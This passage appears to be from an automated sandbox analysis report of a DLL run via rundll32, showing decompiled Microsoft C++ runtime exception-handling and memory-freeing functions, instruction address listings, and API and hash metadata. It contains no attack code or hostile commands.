				_v28 = 0;
				_t279 = E6E77B2DD(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6E77D1AE(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6E779FBB(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6E779FBB(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6E77971A(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6E77964D(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6E77A280(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6E77D1AE(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6E779FBB(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6E779FBB(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6E779FBB(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6E779FBB(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6E77964D(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6E77A280(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6E779A03(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6E779FBB(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6E77AD79(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6E779FBB(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6E779FBB(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6E779FBB(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6E779FBB(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6E77AD79(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6E77D172(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6E77A9E0( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6e78c8e0) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6E779A03(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6E77A98B( &_v64);
											E6E77B38A( &_v64, 0x6e78a5f4);
											L63:
											 *(E6E779FBB(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6E779FBB(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6E779840(_t279, _t319, _t274);
											E6E77AC79(_a8, _a16, _t305);
											_t235 = E6E77AE36(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6E77ABF0(_t274, _t279, _t300, _t305, _t319);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}























































































                                                      0x6e77a300
                                                      0x6e77a307
                                                      0x6e77a309
                                                      0x6e77a312
                                                      0x6e77a318
                                                      0x6e77a320
                                                      0x6e77a322
                                                      0x6e77a325
                                                      0x6e77a32b
                                                      0x6e77a6a4
                                                      0x6e77a6a4
                                                      0x6e77a6a9
                                                      0x6e77a6ab
                                                      0x6e77a6ad
                                                      0x6e77a6b0
                                                      0x6e77a6b1
                                                      0x6e77a6b4
                                                      0x6e77a6ba
                                                      0x6e77a7d9
                                                      0x6e77a6c0
                                                      0x6e77a6c0
                                                      0x6e77a6c1
                                                      0x6e77a6c2
                                                      0x6e77a6c9
                                                      0x6e77a6cc
                                                      0x6e77a6cf
                                                      0x6e77a6d5
                                                      0x6e77a6d7
                                                      0x6e77a6dc
                                                      0x6e77a6df
                                                      0x6e77a6e1
                                                      0x6e77a6e7
                                                      0x6e77a6e9
                                                      0x6e77a6ef
                                                      0x6e77a704
                                                      0x6e77a709
                                                      0x6e77a70c
                                                      0x6e77a70e
                                                      0x6e77a7d5
                                                      0x00000000
                                                      0x6e77a7d6
                                                      0x6e77a70e
                                                      0x6e77a6ef
                                                      0x6e77a6e7
                                                      0x6e77a6df
                                                      0x6e77a714
                                                      0x6e77a717
                                                      0x6e77a71a
                                                      0x6e77a71d
                                                      0x6e77a720
                                                      0x6e77a726
                                                      0x6e77a738
                                                      0x6e77a73d
                                                      0x6e77a740
                                                      0x6e77a743
                                                      0x6e77a746
                                                      0x6e77a749
                                                      0x6e77a74c
                                                      0x6e77a74f
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a755
                                                      0x6e77a755
                                                      0x6e77a758
                                                      0x6e77a75b
                                                      0x6e77a76a
                                                      0x6e77a76b
                                                      0x6e77a76b
                                                      0x6e77a76d
                                                      0x6e77a770
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a772
                                                      0x6e77a775
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a783
                                                      0x6e77a785
                                                      0x6e77a788
                                                      0x6e77a78a
                                                      0x6e77a792
                                                      0x6e77a792
                                                      0x6e77a795
                                                      0x6e77a797
                                                      0x6e77a799
                                                      0x6e77a7b5
                                                      0x6e77a7ba
                                                      0x6e77a7bd
                                                      0x6e77a7bd
                                                      0x00000000
                                                      0x6e77a795
                                                      0x6e77a78c
                                                      0x6e77a790
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a7c0
                                                      0x6e77a7c3
                                                      0x6e77a7c4
                                                      0x6e77a7c7
                                                      0x6e77a7ca
                                                      0x6e77a7cd
                                                      0x6e77a7d0
                                                      0x6e77a7d0
                                                      0x00000000
                                                      0x6e77a75b
                                                      0x6e77a7da
                                                      0x6e77a7df
                                                      0x6e77a7e0
                                                      0x6e77a7e3
                                                      0x6e77a7e6
                                                      0x6e77a7e7
                                                      0x6e77a7e8
                                                      0x6e77a7e9
                                                      0x6e77a7ec
                                                      0x6e77a7ee
                                                      0x6e77a866
                                                      0x6e77a868
                                                      0x6e77a868
                                                      0x6e77a7f0
                                                      0x6e77a7f0
                                                      0x6e77a7f3
                                                      0x6e77a7f6
                                                      0x00000000
                                                      0x6e77a7f8
                                                      0x6e77a7f8
                                                      0x6e77a7fb
                                                      0x6e77a7fe
                                                      0x6e77a805
                                                      0x6e77a805
                                                      0x6e77a808
                                                      0x6e77a80a
                                                      0x6e77a80c
                                                      0x6e77a83e
                                                      0x6e77a83e
                                                      0x6e77a841
                                                      0x6e77a848
                                                      0x6e77a848
                                                      0x6e77a84b
                                                      0x6e77a84e
                                                      0x6e77a855
                                                      0x6e77a855
                                                      0x6e77a858
                                                      0x6e77a85f
                                                      0x6e77a861
                                                      0x6e77a861
                                                      0x6e77a85a
                                                      0x6e77a85a
                                                      0x6e77a85d
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a85d
                                                      0x6e77a850
                                                      0x6e77a850
                                                      0x6e77a853
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a853
                                                      0x6e77a843
                                                      0x6e77a843
                                                      0x6e77a846
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a846
                                                      0x6e77a862
                                                      0x6e77a80e
                                                      0x6e77a80e
                                                      0x6e77a80e
                                                      0x6e77a811
                                                      0x6e77a811
                                                      0x6e77a813
                                                      0x6e77a815
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a817
                                                      0x6e77a819
                                                      0x6e77a82d
                                                      0x6e77a82d
                                                      0x6e77a81b
                                                      0x6e77a81b
                                                      0x6e77a81e
                                                      0x6e77a821
                                                      0x00000000
                                                      0x6e77a823
                                                      0x6e77a823
                                                      0x6e77a826
                                                      0x6e77a829
                                                      0x6e77a82b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a82b
                                                      0x6e77a821
                                                      0x6e77a836
                                                      0x6e77a836
                                                      0x6e77a838
                                                      0x00000000
                                                      0x6e77a83a
                                                      0x6e77a83a
                                                      0x6e77a83a
                                                      0x00000000
                                                      0x6e77a838
                                                      0x6e77a831
                                                      0x6e77a833
                                                      0x6e77a833
                                                      0x00000000
                                                      0x6e77a833
                                                      0x6e77a800
                                                      0x6e77a800
                                                      0x6e77a803
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a803
                                                      0x6e77a7fe
                                                      0x6e77a7f6
                                                      0x6e77a869
                                                      0x6e77a86d
                                                      0x6e77a86d
                                                      0x6e77a33a
                                                      0x6e77a33a
                                                      0x6e77a343
                                                      0x6e77a440
                                                      0x6e77a440
                                                      0x6e77a443
                                                      0x00000000
                                                      0x6e77a372
                                                      0x6e77a372
                                                      0x6e77a377
                                                      0x00000000
                                                      0x6e77a37d
                                                      0x6e77a37d
                                                      0x6e77a385
                                                      0x6e77a63e
                                                      0x6e77a642
                                                      0x6e77a38b
                                                      0x6e77a390
                                                      0x6e77a393
                                                      0x6e77a398
                                                      0x6e77a39f
                                                      0x6e77a3a4
                                                      0x00000000
                                                      0x6e77a3dc
                                                      0x6e77a3e4
                                                      0x6e77a448
                                                      0x6e77a448
                                                      0x6e77a44b
                                                      0x6e77a44e
                                                      0x6e77a450
                                                      0x6e77a453
                                                      0x6e77a456
                                                      0x6e77a45c
                                                      0x6e77a60d
                                                      0x6e77a60d
                                                      0x6e77a610
                                                      0x00000000
                                                      0x6e77a612
                                                      0x6e77a612
                                                      0x6e77a615
                                                      0x00000000
                                                      0x6e77a61b
                                                      0x6e77a61b
                                                      0x6e77a61e
                                                      0x6e77a621
                                                      0x6e77a622
                                                      0x6e77a623
                                                      0x6e77a626
                                                      0x6e77a627
                                                      0x6e77a62a
                                                      0x6e77a62b
                                                      0x6e77a630
                                                      0x00000000
                                                      0x6e77a630
                                                      0x6e77a615
                                                      0x6e77a462
                                                      0x6e77a462
                                                      0x6e77a466
                                                      0x00000000
                                                      0x6e77a46c
                                                      0x6e77a46c
                                                      0x6e77a473
                                                      0x6e77a48b
                                                      0x6e77a48b
                                                      0x6e77a48e
                                                      0x6e77a491
                                                      0x6e77a497
                                                      0x6e77a4a7
                                                      0x6e77a4ac
                                                      0x6e77a4af
                                                      0x6e77a4b2
                                                      0x6e77a4b5
                                                      0x6e77a4b8
                                                      0x6e77a4bb
                                                      0x6e77a4be
                                                      0x6e77a4c4
                                                      0x6e77a4c4
                                                      0x6e77a4c7
                                                      0x6e77a4ca
                                                      0x6e77a4d9
                                                      0x6e77a4da
                                                      0x6e77a4da
                                                      0x6e77a4dc
                                                      0x6e77a4df
                                                      0x6e77a4e5
                                                      0x6e77a4e8
                                                      0x6e77a4ee
                                                      0x6e77a4f0
                                                      0x6e77a4f3
                                                      0x6e77a4f6
                                                      0x6e77a4ff
                                                      0x6e77a502
                                                      0x6e77a504
                                                      0x6e77a504
                                                      0x6e77a507
                                                      0x6e77a50a
                                                      0x6e77a50d
                                                      0x6e77a510
                                                      0x6e77a513
                                                      0x6e77a518
                                                      0x6e77a519
                                                      0x6e77a51a
                                                      0x6e77a51b
                                                      0x6e77a51c
                                                      0x6e77a51f
                                                      0x6e77a521
                                                      0x6e77a523
                                                      0x00000000
                                                      0x6e77a525
                                                      0x6e77a525
                                                      0x6e77a525
                                                      0x6e77a528
                                                      0x6e77a52b
                                                      0x6e77a52d
                                                      0x6e77a52e
                                                      0x6e77a533
                                                      0x6e77a536
                                                      0x6e77a538
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a53a
                                                      0x6e77a53b
                                                      0x6e77a53e
                                                      0x6e77a540
                                                      0x00000000
                                                      0x6e77a542
                                                      0x6e77a542
                                                      0x6e77a545
                                                      0x6e77a548
                                                      0x00000000
                                                      0x6e77a548
                                                      0x00000000
                                                      0x6e77a540
                                                      0x6e77a55c
                                                      0x6e77a562
                                                      0x6e77a57f
                                                      0x6e77a584
                                                      0x6e77a584
                                                      0x6e77a587
                                                      0x6e77a587
                                                      0x00000000
                                                      0x6e77a54b
                                                      0x6e77a54b
                                                      0x6e77a54c
                                                      0x6e77a54f
                                                      0x6e77a552
                                                      0x6e77a555
                                                      0x6e77a555
                                                      0x00000000
                                                      0x6e77a55a
                                                      0x6e77a4f6
                                                      0x6e77a4e8
                                                      0x6e77a58a
                                                      0x6e77a58d
                                                      0x6e77a58e
                                                      0x6e77a591
                                                      0x6e77a594
                                                      0x6e77a597
                                                      0x6e77a59a
                                                      0x6e77a59a
                                                      0x6e77a5a3
                                                      0x6e77a5a6
                                                      0x6e77a5a6
                                                      0x6e77a4be
                                                      0x6e77a5a9
                                                      0x6e77a5ad
                                                      0x6e77a5af
                                                      0x6e77a5b2
                                                      0x6e77a5b8
                                                      0x6e77a5b8
                                                      0x6e77a5c0
                                                      0x6e77a5c5
                                                      0x6e77a633
                                                      0x6e77a633
                                                      0x6e77a638
                                                      0x6e77a63c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a5c7
                                                      0x6e77a5c7
                                                      0x6e77a5cb
                                                      0x6e77a5dd
                                                      0x6e77a5e0
                                                      0x6e77a5e3
                                                      0x6e77a5e5
                                                      0x6e77a5fc
                                                      0x6e77a600
                                                      0x6e77a606
                                                      0x6e77a607
                                                      0x6e77a609
                                                      0x00000000
                                                      0x6e77a60b
                                                      0x00000000
                                                      0x6e77a60b
                                                      0x6e77a5e7
                                                      0x6e77a5ec
                                                      0x6e77a5ef
                                                      0x6e77a5f4
                                                      0x6e77a5f7
                                                      0x00000000
                                                      0x6e77a5f7
                                                      0x6e77a5cd
                                                      0x6e77a5d0
                                                      0x6e77a5d3
                                                      0x6e77a5d5
                                                      0x00000000
                                                      0x6e77a5d7
                                                      0x6e77a5d7
                                                      0x6e77a5db
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a5db
                                                      0x6e77a5d5
                                                      0x6e77a5cb
                                                      0x6e77a475
                                                      0x6e77a475
                                                      0x6e77a47c
                                                      0x00000000
                                                      0x6e77a47e
                                                      0x6e77a47e
                                                      0x6e77a485
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a485
                                                      0x6e77a47c
                                                      0x6e77a473
                                                      0x6e77a466
                                                      0x6e77a3e6
                                                      0x6e77a3ee
                                                      0x6e77a3f1
                                                      0x6e77a3f6
                                                      0x6e77a3fa
                                                      0x6e77a3fd
                                                      0x6e77a403
                                                      0x6e77a406
                                                      0x00000000
                                                      0x6e77a408
                                                      0x6e77a408
                                                      0x6e77a40b
                                                      0x6e77a40d
                                                      0x6e77a643
                                                      0x6e77a643
                                                      0x00000000
                                                      0x6e77a413
                                                      0x6e77a41b
                                                      0x6e77a426
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a42f
                                                      0x6e77a432
                                                      0x6e77a433
                                                      0x6e77a436
                                                      0x6e77a438
                                                      0x00000000
                                                      0x6e77a43e
                                                      0x00000000
                                                      0x6e77a43e
                                                      0x00000000
                                                      0x6e77a438
                                                      0x6e77a413
                                                      0x6e77a648
                                                      0x6e77a648
                                                      0x6e77a64a
                                                      0x6e77a64b
                                                      0x6e77a652
                                                      0x6e77a655
                                                      0x6e77a663
                                                      0x6e77a668
                                                      0x6e77a66d
                                                      0x6e77a670
                                                      0x6e77a675
                                                      0x6e77a678
                                                      0x6e77a67b
                                                      0x6e77a67d
                                                      0x6e77a67f
                                                      0x6e77a67f
                                                      0x6e77a684
                                                      0x6e77a690
                                                      0x6e77a696
                                                      0x6e77a69b
                                                      0x6e77a69e
                                                      0x6e77a69f
                                                      0x00000000
                                                      0x6e77a69f
                                                      0x6e77a406
                                                      0x6e77a3e4
                                                      0x6e77a3a4
                                                      0x6e77a385
                                                      0x6e77a377
                                                      0x6e77a343

                                                      APIs
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 6E77A3FD
                                                      • type_info::operator==.LIBVCRUNTIME ref: 6E77A41F
                                                      • ___TypeMatch.LIBVCRUNTIME ref: 6E77A52E
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 6E77A600
                                                      • _UnwindNestedFrames.LIBCMT ref: 6E77A684
                                                      • CallUnexpected.LIBVCRUNTIME ref: 6E77A69F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 2123188842-393685449
                                                      • Opcode ID: cf25bbf2d76e18d9764a07ab10c10f8e6c6073d99a37dab7bb714dc9af752e32
                                                      • Instruction ID: 0ad212fab8a77a41dc0dbe54e9d28a4e9c76a23abe74056743c98f6c68a1b56c
                                                      • Opcode Fuzzy Hash: cf25bbf2d76e18d9764a07ab10c10f8e6c6073d99a37dab7bb714dc9af752e32
                                                      • Instruction Fuzzy Hash: 51B19C71C14209EFEF28CFE4CA8499EBBB9FF04314B114569E814AB229D735DA52CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F7B11, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 6E7F7B25
                                                        • Part of subcall function 6E7F99B6: HeapFree.KERNEL32(00000000,00000000), ref: 6E7F99CC
                                                        • Part of subcall function 6E7F99B6: GetLastError.KERNEL32(6E849074,?,6E805750,6E849074,00000000,6E849074,00000000,?,6E805A55,6E849074,00000007,6E849074,?,6E804DF4,6E849074,6E849074), ref: 6E7F99DE
                                                      • _free.LIBCMT ref: 6E7F7B31
                                                      • _free.LIBCMT ref: 6E7F7B3C
                                                      • _free.LIBCMT ref: 6E7F7B47
                                                      • _free.LIBCMT ref: 6E7F7B52
                                                      • _free.LIBCMT ref: 6E7F7B5D
                                                      • _free.LIBCMT ref: 6E7F7B68
                                                      • _free.LIBCMT ref: 6E7F7B73
                                                      • _free.LIBCMT ref: 6E7F7B7E
                                                      • _free.LIBCMT ref: 6E7F7B8C
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 95a2f94e163da2a5cd90f925c9e2ac87ac994149d5d107f04150d470f950412b
                                                      • Instruction ID: 7d0ead50f126d5af40db2abbde524f5d1a974fb27ed399f462942d70027d8338
                                                      • Opcode Fuzzy Hash: 95a2f94e163da2a5cd90f925c9e2ac87ac994149d5d107f04150d470f950412b
                                                      • Instruction Fuzzy Hash: 4A11E676910008FFCB01DFD9CA44CD93BA9EF58264B4244A0FA588F335EB35EB519B80
                                                      Uniqueness

